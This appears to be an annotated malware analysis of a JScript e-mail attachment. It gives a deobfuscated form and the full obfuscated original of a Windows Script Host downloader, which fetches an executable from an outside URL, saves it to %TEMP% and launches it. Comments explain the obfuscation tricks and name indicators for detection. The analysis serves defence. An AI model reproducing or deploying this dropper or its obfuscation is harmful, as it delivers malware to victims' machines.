Malicious script I got in an e-mail
// Analyst notes: this is the deobfuscated form of the e-mail attachment shown
// below — a Windows Script Host (JScript) downloader. It fetches a remote
// executable, writes it to %TEMP%, and launches it. It depends on the WSH
// ActiveX objects, so it does nothing in a browser or in Node.
// WScript.Shell: used for environment-variable expansion and for process launch.
var shell = new ActiveXObject('WScript.Shell') | |
// MSXML2.XMLHTTP: the HTTP client used to download the payload.
var xhr = new ActiveXObject('MSXML2.XMLHTTP') | |
// Drop path: %TEMP%/CBMQFs.exe. The file name is hard-coded and is an IoC for
// this sample.
var virus = shell.ExpandEnvironmentStrings('%TEMP%') + '/CBMQFs.exe' | |
// The request below is synchronous (third argument false), so this handler is
// expected to fire once the response is complete (readyState 4). Note the
// lower-case "readystate"; presumably resolves through case-insensitive COM
// dispatch — same spelling is used in the obfuscated original.
xhr.onreadystatechange = function () { | |
if (xhr.readystate === 4) { | |
// ADODB.Stream in binary mode (type 1 = adTypeBinary) writes the raw response
// body to disk.
var stream = new ActiveXObject('ADODB.Stream') | |
stream.open() | |
stream.type = 1 | |
stream.write(xhr.ResponseBody) | |
stream.position = 0 | |
// 2 = adSaveCreateOverWrite: an existing file at the drop path is replaced.
stream.saveToFile(virus, 2) | |
stream.close() | |
} | |
} | |
try { | |
// Download URL (IoC): http://vital4age.de/v4v5g45hg.exe, fetched over plain HTTP.
xhr.open('GET', 'http://vital4age.de/v4v5g45hg.exe', false) | |
xhr.send() | |
// Launches the dropped file. NOTE(review): the obfuscated original builds the
// method name "R"+"un", i.e. shell.Run(virus, 1, false); "RunActiveXObject"
// here looks like a transcription slip in this deobfuscated listing. Window
// style 1 = normal window; false = do not wait for the process to exit.
shell.RunActiveXObject(virus, 1, false) | |
// Any failure (no network, ActiveX blocked, write failure) is swallowed so the
// script exits quietly. For triage: wscript.exe creating an .exe in %TEMP% via
// ADODB.Stream and then launching it is the behaviour to alert on.
} catch (e) {} |
// Analyst notes: the obfuscated original of the downloader above. Three tricks
// are used throughout: (1) strings assigned to never-read globals (ApBcVkzVRDu,
// OjTFnNmRQ, ...) are padding lifted from jQuery/Sizzle source comments;
// (2) parenthesised comma expressions such as ("ignore","erica","savior","gW")
// evaluate to their LAST operand, so the other words are decoys; (3) the token
// "dugout" is junk that is later stripped with split("dugout").join("").
ApBcVkzVRDu = " ...in a gzip-friendly way node = parent; outerCache = node[ expando ] || (node[ expando ] = {});"; | |
insecureI = 0; | |
// Helper: returns the first character of a string; used below to spell
// property names one letter at a time.
String.prototype.positioning = function () { return this.substr(0, 1); }; | |
// After the comma expressions resolve (junk still present), the entries are:
// [0] "SAiusgW" (decoy), [1] "YLSmdzIpL" (decoy), [2] "ExpandEnvironmentStrings",
// [3] "%TEMP%", [4] "/CBMQFs.exe", [5] "Run", [6] "ActiveXObject" (with junk),
// [7] "jdixFLw" (decoy), [8] "pSTgRw" (decoy), [9] "WScript.S" (with junk),
// [10] "NAXOvpX" (decoy), [11] "hell" (with junk), [12] "AjkObRyb" (decoy),
// [13] "PgjcOksYvkN" (decoy), [14] "MSXML2.XMLHTTP" (with junk).
var JjusVCax = ["S"+"Ai"+"us"+("ignore","erica","savior","gW"), ("harvey","ineffable","melbourne","transept","YLS")+"md"+"zI"+("fabric","probe","refined","foamy","pL"), "E"+("cherokee","possession","xpan")+("orlando","haystack","elfin","ottawa","dE")+("chair","session","nv")+"ir"+"onmentSt"+("finland","recalcitrant","conversation","ri")+("curry","continuously","ngs"), ""+("grapple","slake","cheapest","%")+("aberration","thunderbolt","textbooks","TE")+"MP%", "/CBMQFs" + ""+("anoint","seaweed",".")+"exe", "R"+("remix","badinage","un"), ("regional","points","Actdugout")+("compare","insidiously","amidships","iv")+"du"+"gouteXdu"+("shelf","mounts","settlement","go")+("species","exclusion","utOb")+("solidarity","telescope","du")+"go"+("unabated","generated","pithy","arcadia","utje")+("spread","calendar","wallis","obstruction","du")+("teamster","errol","dualism","services","go")+("chips","imperil","dialogue","ut")+("lustrous","commissioner","guinea","threatened","ct"), "jdixFLw", "pSTgRw", ("augment","trespass","W")+"Sc"+"du"+("characteristic","creeper","goutript")+"dugout." + ("bombard","absolved","overrated","S"), "NAXOvpX", "h"+"dugo"+"ut"+"el"+"du"+("heath","workhouse","compressed","go")+"utl", "AjkObRyb", "P"+"gj"+("nudity","apostolic","cO")+"ksYvkN", "Mdu"+("reservoir","ethiopia","go")+("scout","hovel","trinity","ut")+("install","vision","SXdu")+"gout"+("maybe","tolerance","MLdugout2") + "."+"du"+"go"+"ut"+"XM"+("college","killer","prosy","du")+"go"+"ut"+"LH"+"du"+"go"+"ut"+"TTP"]; | |
OjTFnNmRQ = " Fallback to seeking `elem` from the start (diff = nodeIndex = 0) || start.pop()) ) {"; | |
// splice(7, 2): removes the two decoys at [7] and [8]; "WScript.S" is now [7],
// "hell" is [9], "MSXML2.XMLHTTP" is [12].
JjusVCax.splice(7, insecureI + 2); | |
// [6] with junk removed -> "ActiveXObject".
ugliness = JjusVCax[2+2+2].split("dugout").join(""); | |
// `this` is the global object here, so gLyfdlw is the ActiveXObject constructor.
var gLyfdlw = this[ugliness]; | |
XkGGnvVviQQ = "pKmmYpEOYek"; | |
// sensitive = "p", prestons = "s" (first character of the resolved strings).
sensitive = (("reiterate", "michael", "KaqiMeljdT", "assisted", "pXvhVWd") + "bVOPSi").positioning(); | |
prestons = (("elopement", "integral", "bNVmbVTY", "auditor", "sVmfMHeEHUu") + "oPRtHLYcn").positioning(); | |
insecureI = 6; | |
// [7] = [7] + [9] -> "WScript.S" + "hell" (junk still present).
JjusVCax[insecureI + 1] = JjusVCax[insecureI + 1] + JjusVCax[insecureI + 3]; | |
JjusVCax[insecureI + 2] = "UghOKppVbXn"; | |
insecureI++; | |
// insecureI is 7: splice(8, 3) drops three more decoys, leaving
// [7] "WScript.Shell" (junk), [8] "PgjcOksYvkN", [9] "MSXML2.XMLHTTP" (junk).
JjusVCax.splice(insecureI + 1, insecureI - 4); | |
JjusVCax[insecureI] = JjusVCax[insecureI].split("dugout").join(""); | |
// Bgehhk = new ActiveXObject("WScript.Shell").
var Bgehhk = new gLyfdlw(JjusVCax[insecureI]); | |
ElIQpsWrhTy = " cache = uniqueCache[ type ] || []; nodeIndex = cache[ 0 ] === dirruns && cache[ 1 ]; diff = nodeIndex && cache[ 2 ]; node = nodeIndex && parent.childNodes[ nodeIndex ];"; | |
insecureI++; | |
JjusVCax[insecureI + 1] = JjusVCax[insecureI + 1].split("dugout").join(""); | |
// VrMzrLLlD = new ActiveXObject("MSXML2.XMLHTTP").
var VrMzrLLlD = new gLyfdlw(JjusVCax[insecureI+1]); | |
elVCEpWQK = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] || (outerCache[ node.uniqueID ] = {});"; | |
// insecureI becomes 4, so the indices below are [2], [3], [4].
insecureI /= 2; | |
// boqCakIHC = shell.ExpandEnvironmentStrings("%TEMP%") + "/CBMQFs.exe" (drop path, IoC).
var boqCakIHC = Bgehhk[JjusVCax[insecureI-2]](JjusVCax[insecureI - 1]) + JjusVCax[insecureI]; | |
afWWWOpLSwq = " while ( (node = ++nodeIndex && node && node[ dir ] ||"; | |
VrMzrLLlD.onreadystatechange = function () { | |
// Property name resolves to "readystate"; 4 = request complete.
if (VrMzrLLlD["rea"+"dy"+("coterie","haphazard","actuality","st")+("abdication","elect","ate")] === 4) { | |
// "ApODB.Stream".replace("p", "D") -> new ActiveXObject("ADODB.Stream").
var sJQvR = new gLyfdlw((""+"A"+("structured","auditorium","pO")+("herbage","hughes","cyclone","DB.")+""+"S"+"tr"+("sanity","traditionally","statistical","astute","eam")).replace("p", "D")); | |
sJQvR.open(); | |
lFJQvFf = " When found, cache indexes on `parent` and break if ( node.nodeType === 1 && ++diff && node === elem ) { uniqueCache[ type ] = [ dirruns, nodeIndex, diff ]; break; } "; | |
// 8*(4-3-1)+1 = 1 -> binary stream (adTypeBinary).
sJQvR.type = 8*(4-3-1)+1; | |
RaHCKzsLqKb = "} } else { Use previously-cached element index if available if ( useCache ) { ...in a gzip-friendly way node = elem; outerCache = node[ expando ] || (node[ expando ] = {});"; | |
// stream.write(xhr.ResponseBody) — property spelled "R"+"es"+"pon"+"s"+"e"+"Bo"+"dy".
sJQvR[("frontpage","tramadol","w")+"ri"+"te"](VrMzrLLlD[""+"R"+"es"+("memory","replacement","benighted","pon")+prestons+"e"+("parts","scalp","bunch","grotto","Bo")+"dy"]); | |
nMkCSsvh = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] || (outerCache[ node.uniqueID ] = {});"; | |
// "poDition".replace("D", "s") -> stream.position = 0.
sJQvR[(sensitive+"o"+"Di"+"ti"+("extricate","keyword","damage","on")).replace("D", prestons)] = 0; | |
vbbnPY = " cache = uniqueCache[ type ] || []; nodeIndex = cache[ 0 ] === dirruns && cache[ 1 ]; diff = nodeIndex; "; | |
// Writes the payload to the drop path; 2 = adSaveCreateOverWrite.
sJQvR.saveToFile(boqCakIHC, 2); | |
SMTqKOY = "} xml :nth-child(...) or :nth-last-child(...) or :nth(-last)?-of-type(...) if ( diff === false ) { Use the same loop as above to seek `elem` from the start while ( (node = ++nodeIndex && node && node[ dir ] || (diff = nodeIndex = 0) || start.pop()) ) {"; | |
sJQvR.close(); | |
xtmwwD = " if ( ( ofType ? node.nodeName.toLowerCase() === name : node.nodeType === 1 ) && ++diff ) {"; | |
}; | |
}; | |
try { | |
ivSbyvgX = " Cache the index of each encountered element if ( useCache ) { outerCache = node[ expando ] || (node[ expando ] = {});"; | |
// xhr.open("GET", "http://vital4age.de/v4v5g45hg.exe", false) — download URL (IoC), synchronous.
VrMzrLLlD.open("G"+("phalanx","forbidden","mainstream","trauma","ET"), "htt"+("circumstances","animosity","p://")+("authoritative","spectrum","schooling","vi")+"ta"+("quantitative","profligate","binary","denomination","l4")+("confounding","write","caricature","levitra","age.de")+("cyber","sequence","affluence","/v4v5g")+"45"+"hg.e"+"xe", false); | |
kXTvYF = " Support: IE <9 only Defend against cloned attroperties (jQuery gh-1709) uniqueCache = outerCache[ node.uniqueID ] || (outerCache[ node.uniqueID ] = {});"; | |
// "s" + "e" + "n" + "d" -> xhr.send().
VrMzrLLlD[prestons + ("villas","supervision","medicine","e") + (("lectures", "statistical", "UAcRDQK", "sound", "scrubs", "nyNjfyfXKxb") + "FtNATMOQfLT").positioning() + (("drainage", "scanners", "bQerVtKQq", "astronomy", "ivory", "diBJmayWmnv") + "gaUgahfN").positioning()](); | |
EXDkho = " uniqueCache[ type ] = [ dirruns, diff ]; "; | |
// JjusVCax[5] is "Run": shell.Run(dropPath, 1, false). The string comparison is
// always false (do not wait for the process). This is the launch step to alert on.
Bgehhk[JjusVCax[insecureI+1]](boqCakIHC, 1, "McqMjBUl" === "PHLpSRy"); xdVphT = " \"PSEUDO\": function( pseudo, argument ) { pseudo-class names are case-insensitive http:www.w3.org/TR/selectors/#pseudo-classes Prioritize by case sensitivity in case custom pseudos are added with uppercase letters Remember that setFilters inherits from pseudos var args, fn = Expr.pseudos[ pseudo ] || Expr.setFilters[ pseudo.toLowerCase() ] || Sizzle.error( \"unsupported pseudo: \" + pseudo );"; | |
hUQjlUlE = "} if ( node === elem ) { break; } } } } "; | |
// All errors are swallowed so the script exits silently on failure.
} catch (nGDSVs) { }; | |
qfjWze = "} Incorporate the offset, then check against cycle size diff -= last; return diff === first || ( diff % first === 0 && diff / first >= 0 ); } }; },"; |